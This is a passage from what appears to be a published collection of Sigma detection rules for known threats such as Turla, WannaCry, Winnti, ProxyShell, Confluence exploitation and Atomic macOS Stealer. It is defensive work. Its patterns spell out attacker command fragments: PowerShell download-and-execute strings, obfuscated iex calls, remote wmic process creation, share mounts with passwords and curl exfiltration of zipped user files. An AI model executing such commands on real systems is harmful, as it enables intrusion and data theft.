tags:
    - attack.initial-access
    - attack.persistence
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\sqlservr.exe'
        ParentCommandLine|contains: 'VEEAMSQL'
    selection_child_1:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wsl.exe'
            - '\wt.exe'
        CommandLine|contains:
            - '-ex '
            - 'bypass'
            - 'cscript'
            - 'DownloadString'
            - 'http://'
            - 'https://'
            - 'mshta'
            - 'regsvr32'
            - 'rundll32'
            - 'wscript'
            - 'copy '
    selection_child_2:
        Image|endswith:
            - '\net.exe'
            - '\net1.exe'
            - '\netstat.exe'
            - '\nltest.exe'
            - '\ping.exe'
            - '\tasklist.exe'
            - '\whoami.exe'
    condition: selection_parent and 1 of selection_child_*
level: critical
critical · Moderate · High FP
Suspicious PowerShell Mailbox Export to Share
title: Suspicious PowerShell Mailbox Export to Share
id: 889719ef-dd62-43df-86c3-768fb08dc7c0
status: test
description: Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitation
references:
    - https://youtu.be/5mqid-7zp8k?t=2481
    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Florian Roth (Nextron Systems)
date: 2021-08-07
modified: 2022-10-26
tags:
    - attack.exfiltration
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'New-MailboxExportRequest'
            - ' -Mailbox '
            - ' -FilePath \\\\'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical · Moderate · High FP
TrustedPath UAC Bypass Pattern
title: TrustedPath UAC Bypass Pattern
id: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126
related:
    - id: 0cbe38c0-270c-41d9-ab79-6e5a9a669290
      type: similar
status: test
description: Detects indicators of a UAC bypass method by mocking directories
references:
    - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
    - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
    - https://github.com/netero1010/TrustedPath-UACBypass-BOF
    - https://x.com/Wietze/status/1933495426952421843
author: Florian Roth (Nextron Systems)
date: 2021-08-27
modified: 2025-06-17
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|contains:
            - 'C:\Windows \System32\'
            - 'C:\Windows \SysWOW64\'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Moderate
Medium FP
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
view Sigma YAML
title: Turla Group Commands May 2020
id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c
status: test
description: Detects commands used by Turla group as reported by ESET in May 2020
references:
- https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
author: Florian Roth (Nextron Systems)
date: 2020-05-26
modified: 2025-10-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.stealth
- attack.g0010
- attack.execution
- attack.t1059.001
- attack.t1053.005
- attack.t1027
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_cli_1:
CommandLine|contains:
- 'tracert -h 10 yahoo.com'
- '.WSqmCons))|iex;'
- 'Fr`omBa`se6`4Str`ing'
selection_cli_2:
CommandLine|re: 'net\s+use\s+https://docs.live.net'
CommandLine|contains: '@aol.co.uk'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical

critical
Moderate
High FP
Turla Group Lateral Movement
Detects automated lateral movement by Turla group

title: Turla Group Lateral Movement
id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f
status: test
description: Detects automated lateral movement by Turla group
references:
    - https://securelist.com/the-epic-turla-operation/65545/
author: Markus Neis
date: 2017-11-07
modified: 2022-10-09
tags:
    - attack.g0010
    - attack.execution
    - attack.t1059
    - attack.lateral-movement
    - attack.t1021.002
    - attack.discovery
    - attack.t1083
    - attack.t1135
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - 'net use \\\\%DomainController%\C$ "P@ssw0rd" *'
            - 'dir c:\\*.doc* /s'
            - 'dir %TEMP%\\*.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical
Moderate
High FP
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports

title: UNC2452 PowerShell Pattern
id: b7155193-8a81-4d8f-805d-88de864ca50c
status: test
description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
references:
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
    - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
author: Florian Roth (Nextron Systems)
date: 2021-01-20
modified: 2022-10-09
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1047
    - detection.emerging-threats
    # - sunburst
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli_1:
        CommandLine|contains|all:
            - 'Invoke-WMIMethod win32_process -name create -argumentlist'
            - 'rundll32 c:\windows'
    selection_cli_2:
        CommandLine|contains|all:
            - 'wmic /node:'
            - 'process call create "rundll32 c:\windows'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

critical
Moderate
High FP
UNC4841 - Potential SEASPY Execution
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor

title: UNC4841 - Potential SEASPY Execution
id: f6a711f3-d032-4f9e-890b-bbe776236c84
status: test
description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
references:
    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '/BarracudaMailService'
            - '/resize2fstab'
            - '/resize_reisertab'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical
Strong
Medium FP
WMI Backdoor Exchange Transport Agent
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters

title: WMI Backdoor Exchange Transport Agent
id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b
status: test
description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
references:
    - https://twitter.com/cglyer/status/1182389676876980224
    - https://twitter.com/cglyer/status/1182391019633029120
author: Florian Roth (Nextron Systems)
date: 2019-10-11
modified: 2023-02-08
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\EdgeTransport.exe'
    filter_conhost:
        Image: 'C:\Windows\System32\conhost.exe'
    filter_oleconverter: # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18
        Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\'
        Image|endswith: '\Bin\OleConverter.exe'
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: critical

critical
Moderate
High FP
WannaCry Ransomware Activity
Detects WannaCry ransomware activity

title: WannaCry Ransomware Activity
id: 41d40bff-377a-43e2-8e1b-2e543069e079
status: test
description: Detects WannaCry ransomware activity
references:
    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
    - https://x.com/nas_bench/status/1868639048484425963
author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro
date: 2019-01-16
modified: 2025-10-18
tags:
    - attack.lateral-movement
    - attack.defense-impairment
    - attack.t1210
    - attack.discovery
    - attack.t1083
    - attack.t1222.001
    - attack.impact
    - attack.t1486
    - attack.t1490
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\tasksche.exe'
              - '\mssecsvc.exe'
              - '\taskdl.exe'
              - '\taskhsvc.exe'
              - '\taskse.exe'
              - '\111.exe'
              - '\lhdfrgui.exe'
              # - '\diskpart.exe' # cannot be used in a rule of level critical
              - '\linuxnew.exe'
              - '\wannacry.exe'
        - Image|contains: 'WanaDecryptor'
    selection_cmd:
        CommandLine|contains: '@[email protected]'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical

critical
Moderate
High FP
Windows Credential Editor Registry
Detects the use of Windows Credential Editor (WCE)

title: Windows Credential Editor Registry
id: a6b33c02-8305-488f-8585-03cb2a7763f2
status: test
description: Detects the use of Windows Credential Editor (WCE)
references:
    - https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.s0005
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: Services\WCESERVICE\Start
    condition: selection
falsepositives:
    - Unknown
level: critical

critical
Strong
Medium FP
Winnti Malware HK University Campaign
Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities

title: Winnti Malware HK University Campaign
id: 3121461b-5aa0-4a41-b910-66d25524edbb
status: test
description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
references:
    - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
author: Florian Roth (Nextron Systems), Markus Neis
date: 2020-02-01
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
    - attack.g0044
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|contains:
            - 'C:\Windows\Temp'
            - '\hpqhvind.exe'
        Image|startswith: 'C:\ProgramData\DRM'
    selection2:
        ParentImage|startswith: 'C:\ProgramData\DRM'
        Image|endswith: '\wmplayer.exe'
    selection3:
        ParentImage|endswith: '\Test.exe'
        Image|endswith: '\wmplayer.exe'
    selection4:
        Image: 'C:\ProgramData\DRM\CLR\CLR.exe'
    selection5:
        ParentImage|startswith: 'C:\ProgramData\DRM\Windows'
        Image|endswith: '\SearchFilterHost.exe'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical

critical
Strong
Medium FP
Winnti Pipemon Characteristics
Detects specific process characteristics of Winnti Pipemon malware reported by ESET

title: Winnti Pipemon Characteristics
id: 73d70463-75c9-4258-92c6-17500fe972f2
status: stable
description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
references:
    - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
author: Florian Roth (Nextron Systems), oscd.community
date: 2020-07-30
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
    - attack.g0044
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_1:
        CommandLine|contains: 'setup0.exe -p'
    selection_2:
        CommandLine|contains: 'setup.exe'
        CommandLine|endswith:
            - '-x:0'
            - '-x:1'
            - '-x:2'
    condition: 1 of selection_*
falsepositives:
    - Legitimate setups that use similar flags
level: critical

critical
Moderate
High FP
Wmiexec Default Output File
Detects the creation of the default output filename used by the wmiexec tool

title: Wmiexec Default Output File
id: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb
status: test
description: Detects the creation of the default output filename used by the wmiexec tool
references:
    - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/
    - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-02
modified: 2023-03-08
tags:
    - attack.lateral-movement
    - attack.execution
    - attack.t1047
logsource:
    category: file_event
    product: windows
detection:
    selection:
        - TargetFilename|re: '\\Windows\\__1\d{9}\.\d{1,7}$' # Admin$
        - TargetFilename|re: 'C:\\__1\d{9}\.\d{1,7}$' # C$
        - TargetFilename|re: 'D:\\__1\d{9}\.\d{1,7}$' # D$
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical
Moderate
Medium FP
Wmiprvse Wbemcomn DLL Hijack - File
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.

title: Wmiprvse Wbemcomn DLL Hijack - File
id: 614a7e17-5643-4d89-b6fe-f9df1a79641c
status: test
description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
references:
    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-12
modified: 2022-12-02
tags:
    - attack.execution
    - attack.t1047
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image: System
        TargetFilename|endswith: '\wbem\wbemcomn.dll'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical
Moderate
Medium FP
ZxShell Malware
Detects a ZxShell start by the called and well-known function name

title: ZxShell Malware
id: f0b70adb-0075-43b0-9745-e82a1c608fcc
status: test
description: Detects a ZxShell start by the called and well-known function name
references:
    - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
    - https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2017-07-20
modified: 2021-11-27
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.003
    - attack.t1218.011
    - attack.s0412
    - attack.g0001
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains:
            - 'zxFunction'
            - 'RemoteDiskXXXXX'
    condition: selection
falsepositives:
    - Unlikely
level: critical

high
Moderate
Medium FP
.RDP File Created By Uncommon Application
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.

title: .RDP File Created By Uncommon Application
id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d
related:
    - id: f748c45a-f8d3-4e6f-b617-fe176f695b8f
      type: derived
status: test
description: |
    Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
references:
    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/
    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-18
modified: 2024-11-01
tags:
    - attack.stealth
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith: '.rdp'
        Image|endswith:
            # Covers browsers
            - '\brave.exe'
            - '\CCleaner Browser\Application\CCleanerBrowser.exe'
            - '\chromium.exe'
            - '\firefox.exe'
            - '\Google\Chrome\Application\chrome.exe'
            - '\iexplore.exe'
            - '\microsoftedge.exe'
            - '\msedge.exe'
            - '\Opera.exe'
            - '\Vivaldi.exe'
            - '\Whale.exe'
            # Covers email clients
            - '\olk.exe' # Outlook
            - '\Outlook.exe'
            - '\RuntimeBroker.exe' # If the windows mail client is used
            - '\Thunderbird.exe'
            # Covers chat applications
            - '\Discord.exe' # Should open the browser for download, but just in case.
            - '\Keybase.exe'
            - '\msteams.exe'
            - '\Slack.exe'
            - '\teams.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

high
Moderate
Medium FP
AMSI Disabled via Registry Modification
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.

title: AMSI Disabled via Registry Modification
id: aa37cbb0-da36-42cb-a90f-fdf216fc7467
related:
    - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 # Windows AMSI Related Registry Tampering Via CommandLine
      type: similar
status: experimental
description: |
    Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
    Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
    Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.
references:
    - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
    - https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
    - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-25
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Software\Microsoft\Windows Script\Settings\AmsiEnable'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unlikely
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml
simulation:
    - type: atomic-red-team
      name: AMSI Bypass - Create AMSIEnable Reg Key
      technique: T1562.001
      atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0

high
Strong
Medium FP
APT PRIVATELOG Image Load Pattern
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances

title: APT PRIVATELOG Image Load Pattern
id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc
status: test
description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
references:
    - https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
author: Florian Roth (Nextron Systems)
date: 2021-09-07
modified: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\svchost.exe'
        ImageLoaded|endswith: '\clfsw32.dll'
    condition: selection
falsepositives:
    - Rarely observed
level: high

high
Moderate
Medium FP
Abusable DLL Potential Sideloading From Suspicious Location
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

title: Abusable DLL Potential Sideloading From Suspicious Location
id: 799a5f48-0ac1-4e0f-9152-71d137d48c2a
status: test
description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
references:
    - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
author: X__Junior (Nextron Systems)
date: 2023-07-11
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: image_load
    product: windows
detection:
    selection_dll:
        ImageLoaded|endswith:
            # Note: Add more generic DLLs that cannot be pin-pointed to a single application
            - '\coreclr.dll'
            - '\facesdk.dll'
            - '\HPCustPartUI.dll'
            - '\libcef.dll'
            - '\ZIPDLL.dll'
    selection_folders_1:
        ImageLoaded|contains:
            - ':\Perflogs\'
            - ':\Users\Public\'
            - '\Temporary Internet'
            - '\Windows\Temp\'
    selection_folders_2:
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\Pictures\'
    condition: selection_dll and 1 of selection_folders_*
falsepositives:
    - Unknown
level: high

high
Moderate
High FP
Add Debugger Entry To Hangs Key For Persistence
Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes

title: Add Debugger Entry To Hangs Key For Persistence
id: 833ef470-fa01-4631-a79b-6f291c9ac498
status: test
description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
references:
    - https://persistence-info.github.io/Data/wer_debugger.html
    - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-21
modified: 2023-08-17
tags:
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Hangs\Debugger'
    condition: selection
falsepositives:
    - This value is not set by default but could be rarely used by administrators
level: high

high
Moderate
High FP
Adwind RAT / JRAT
Detects javaw.exe in AppData folder as used by Adwind / JRAT

title: Adwind RAT / JRAT
id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-10-09
tags:
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains|all:
              - '\AppData\Roaming\Oracle'
              - '\java'
              - '.exe '
        - CommandLine|contains|all:
              - 'cscript.exe'
              - 'Retrive'
              - '.vbs '
    condition: selection
level: high

high
Moderate
High FP
Adwind RAT / JRAT File Artifact
Detects javaw.exe in AppData folder as used by Adwind / JRAT

title: Adwind RAT / JRAT File Artifact
id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1
related:
    - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
      type: derived
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-12-02
tags:
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
logsource:
    category: file_event
    product: windows
detection:
    selection:
        - TargetFilename|contains|all:
              - '\AppData\Roaming\Oracle\bin\java'
              - '.exe'
        - TargetFilename|contains|all:
              - '\Retrive'
              - '.vbs'
    condition: selection
level: high

high
Moderate
Medium FP
Antivirus Filter Driver Disallowed On Dev Drive - Registry
Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".

title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
id: 31e124fb-5dc4-42a0-83b3-44a69c77b271
status: test
description: |
    Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
references:
    - https://twitter.com/0gtweet/status/1720419490519752955
author: '@kostastsale, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-11-05
modified: 2024-08-16
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\FilterManager\FltmgrDevDriveAllowAntivirusFilter'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unlikely
level: high

high
Moderate
Medium FP
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command-line perspective

title: Apache Spark Shell Command Injection - ProcessCreation
id: c8a5f584-cdc8-42cc-8cce-0398e4265de3
status: test
description: Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command-line perspective
references:
    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
    - https://github.com/apache/spark/pull/36315/files
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-20
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2022-33891
    - detection.emerging-threats
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        ParentImage|endswith: '\bash'
        CommandLine|contains:
            - 'id -Gn `'
            - "id -Gn '"
    condition: selection
falsepositives:
    - Unlikely
level: high

high
Moderate
Medium FP
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

title: Aruba Network Service Potential DLL Sideloading
id: 90ae0469-0cee-4509-b67f-e5efcef040f7
status: test
description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
references:
    - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
modified: 2023-03-15
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\arubanetsvc.exe'
        ImageLoaded|endswith:
            - '\wtsapi32.dll'
            - '\msvcr100.dll'
            - '\msvcp100.dll'
            - '\dbghelp.dll'
            - '\dbgcore.dll'
            - '\wininet.dll'
            - '\iphlpapi.dll'
            - '\version.dll'
            - '\cryptsp.dll'
            - '\cryptbase.dll'
            - '\wldp.dll'
            - '\profapi.dll'
            - '\sspicli.dll'
            - '\winsta.dll'
            - '\dpapi.dll'
    filter:
        ImageLoaded|startswith:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

high
Moderate
High FP
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

title: Atlassian Confluence CVE-2022-26134
id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
related:
    - id: 245f92e3-c4da-45f1-9070-bc552e06db11
      type: derived
status: test
description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1190
    - attack.t1059
    - cve.2022-26134
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        # Monitor suspicious child processes spawned by Confluence
        ParentImage|startswith: '/opt/atlassian/confluence/'
        ParentImage|endswith: '/java'
        CommandLine|contains:
            - '/bin/sh'
            - 'bash'
            - 'dash'
            - 'ksh'
            - 'zsh'
            - 'csh'
            - 'fish'
            - 'curl'
            - 'wget'
            - 'python'
    condition: selection
falsepositives:
    - Unknown
level: high

high
Moderate
High FP
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.

title: Atomic MacOS Stealer - FileGrabber Activity
id: e710a880-1f18-4417-b6a0-b5afdf7e33da
related:
    - id: e710a880-1f18-4417-b6a0-b5afdf7e305a
      type: obsolete
status: experimental
description: |
    Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
references:
    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
    - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.execution
    - attack.t1059.002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: macos
detection:
    selection_curl_post:
        CommandLine|contains|all:
            - 'curl'
            - 'POST'
            - 'user:'
            - '-H '
            - 'BuildID'
            - 'file=@/tmp/out.zip'
            - 'cl: 0'
    selection_filegrabber_exec:
        CommandLine|contains|all:
            - 'FileGrabber'
            - '/tmp'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

high
Moderate
Medium FP
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.

title: Atomic MacOS Stealer - Persistence Indicators
id: e710a880-1f18-4417-b6a0-b5afdf7e3023
status: experimental
description: |
